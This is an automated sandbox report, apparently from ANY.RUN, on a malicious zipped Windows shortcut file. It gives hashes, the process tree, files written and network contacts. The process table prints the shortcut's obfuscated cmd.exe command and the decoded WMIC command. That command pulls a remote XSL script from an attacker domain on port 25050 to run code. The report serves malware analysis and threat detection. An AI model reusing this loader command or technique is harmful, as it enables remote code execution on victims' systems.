Field | Value
---|---
File name | Doc_documento_PRC2019008850.lnk.zip
Full analysis | https://app.any.run/tasks/56ad4bd3-be58-483e-91cf-93562e2df962
Verdict | Malicious activity
Analysis date | April 25, 2019, 18:11:35
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators | —
MIME | application/zip
File info | Zip archive data, at least v2.0 to extract
MD5 | C02D776CC8A47FD0F5EC4A7241E5DAC8
SHA1 | 6014601C801D7B731EAD888394A4DF1C82AE0679
SHA256 | C5FBE5856E0DC42EC26CD54A0249033F9BE3E80357FA5BAAADD75F629FC7ED87
SSDEEP | 24:8fNZIjKY6vSgErlthKGS4078JL85n+KlvCNg/fM:SvfErlLbS4K8Jgskvmgc
.zip | ZIP compressed archive (100)
---|---
ZipRequiredVersion | 788
ZipBitFlag | 0x0001
ZipCompression | Deflated
ZipModifyDate | 2019:04:25 20:08:06
ZipCRC | 0x1730b459
ZipCompressedSize | 950
ZipUncompressedSize | 3132
ZipFileName | Doc_documento_PRC2019008850.lnk
PID | CMD | Path | Indicators | Parent process | User | Company | Integrity Level | Description | Exit code | Version
---|---|---|---|---|---|---|---|---|---|---
2536 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Doc_documento_PRC2019008850.lnk.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe | admin | Alexander Roshal | MEDIUM | WinRAR archiver | 0 | 5.60.0
3460 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\cmd.exe" | C:\Program Files\Notepad++\notepad++.exe | — | explorer.exe | admin | Don HO | MEDIUM | Notepad++ : a free (GNU) source code editor | 0 | 7.51
3484 | "C:\Program Files\Notepad++\updater\gup.exe" -v7.51 | C:\Program Files\Notepad++\updater\gup.exe | — | notepad++.exe | admin | Don HO | MEDIUM | GUP : a free (LGPL) Generic Updater | 0 | 4.1
2768 | "C:\Program Files\Notepad++\notepad++.exe" "C:\Windows\System32\cmd.exe" | C:\Program Files\Notepad++\notepad++.exe | — | explorer.exe | admin | Don HO | MEDIUM | Notepad++ : a free (GNU) source code editor | 0 | 7.51
4056 | "C:\Windows\System32\cmd.exe" /V /C "set x=C[1323]:\\[1323]Wi[1323]nd[1323]ow[1323]s\\s[1323]ys[1323]te[1323]m3[1323]2[1323]\\[1323]wbe[1323]m\\W[1323]M[1323]I[1323]C.e[1323]x[1323]e o[1323]s g[1323]e[1323]t HHK[1323]r[1323]m[1323]c[1323]m[1323]x[1323]i[1323], or[1323]g[1323]an[1323]iz[1323]at[1323]io[1323]n /[1323]form[1323]at:"h[1323]t[1323]t[1323]p[1323]:[1323]/[1323]/Kc[1323]z[1323]v[1323]v[1323]j[1323]e[1323]d[1323]2[1323].c[1323]hr[1323]om[1323]iu[1323]nx[1323]js[1323]t.[1323]sit[1323]e:2[1323]505[1323]0/0[1323]4/?[1323]1[1323]3[1323]7[1323]0[1323]2[1323]5[1323]0[1323]5[1323]0[1323]L[1323]SK[1323]qc[1323]xm[1323]vv[1323]" &&echo %x:[1323]=%\|C:\Windows\system32\cmd.exe" | C:\Windows\System32\cmd.exe | — | explorer.exe | admin | Microsoft Corporation | HIGH | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2148 | C:\Windows\system32\cmd.exe /S /D /c" echo %x:[1323]=%" | C:\Windows\system32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | HIGH | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
2792 | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe | — | cmd.exe | admin | Microsoft Corporation | HIGH | Windows Command Processor | 0 | 6.1.7601.17514 (win7sp1_rtm.101119-1850)
1472 | C:\\Windows\\system32\\wbem\\WMIC.exe os get HHKrmcmxi, organization /format:"http://Kczvvjed2.chromiunxjst.site:25050/04/?137025050LSKqcxmvv" | C:\Windows\system32\wbem\WMIC.exe | — | cmd.exe | admin | Microsoft Corporation | HIGH | WMI Commandline Utility | 44210 | 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
2536 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2536.42352\Doc_documento_PRC2019008850.lnk | lnk | 01227B06022DF6092AE9EF6737AF2395 | F88680DFC0F3CBC9EC66231FAC936888AD737F78116F5B0F5D2B0D769C0EF7AF
2768 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\config.xml | xml | 0592DE4EC69FAE006D3A55A0C522C6CA | 1D894E5FAF877F16DC2886B0667F624BD0199825F5B951115D61F8A3AE5C2B38
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\session.xml | text | 4DF06A3367C04439C0C3BB6EDA8A30EF | 4F719FE0608CE5C43D31A48B36D3938CE444D897CF77BB92596DCA23363BB19B
2768 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\session.xml | text | 90775F632F2113623F9BE3FF49B2A026 | F9F0800278CABCEE1D7CCF8D12EBAED9D2171594C5FD23954FA35CE30A26081A
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\config.xml | xml | 2C259C204983D0A1BF469E9B95AD1BF2 | AE0AAE595C529BCA88D249358DB898243BC2C3BFE49D1D44ABED8A6D4ADC7E29
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\plugins\Config\converter.ini | text | F70F579156C93B097E656CABA577A5C9 | B926498A19CA95DC28964B7336E5847107DD3C0F52C85195C135D9DD6CA402D4
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\langs.xml | xml | E792264BEC29005B9044A435FBA185AB | 5298FD2F119C43D04F6CF831F379EC25B4156192278E40E458EC356F9B49D624
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\stylers.xml | xml | 44982E1D48434C0AB3E8277E322DD1E4 | 3E661D3F1FF3977B022A0ACC26B840B5E57D600BC03DCFC6BEFDB408C665904C
3460 | notepad++.exe | C:\Users\admin\AppData\Roaming\Notepad++\shortcuts.xml | text | AD21A64014891793DD9B21D835278F36 | C24699C9D00ABDD510140FE1B2ACE97BFC70D8B21BF3462DED85AFC4F73FE52F
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | 2.21.242.197:80 | http://isrg.trustid.ocsp.identrust.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBRv9GhNQxLSSGKBnMArPUcsHYovpgQUxKexpHsscfrb4UuQdf%2FEFWCFiRACEAoBQUIAAAFThXNqC4Xspwg%3D | NL | der | 1.37 Kb | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3484 | gup.exe | 37.59.28.236:443 | notepad-plus-plus.org | OVH SAS | FR | whitelisted |
1472 | WMIC.exe | 35.222.129.65:25050 | kczvvjed2.chromiunxjst.site | — | US | unknown |
1472 | WMIC.exe | 35.198.7.231:25050 | kczvvjed2.chromiunxjst.site | Google Inc. | US | suspicious |
— | — | 2.21.242.197:80 | isrg.trustid.ocsp.identrust.com | Akamai International B.V. | NL | whitelisted |
Domain | IP | Reputation
---|---|---
notepad-plus-plus.org | — | whitelisted
isrg.trustid.ocsp.identrust.com | — | whitelisted
kczvvjed2.chromiunxjst.site | — | suspicious
dns.msftncsi.com | — | shared
Process | Message
---|---
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093
notepad++.exe | VerifyLibrary: C:\Program Files\Notepad++\SciLexer.dll
notepad++.exe | VerifyLibrary: certificate revocation checking is disabled
notepad++.exe | 42C4C5846BB675C74E2B2C90C69AB44366401093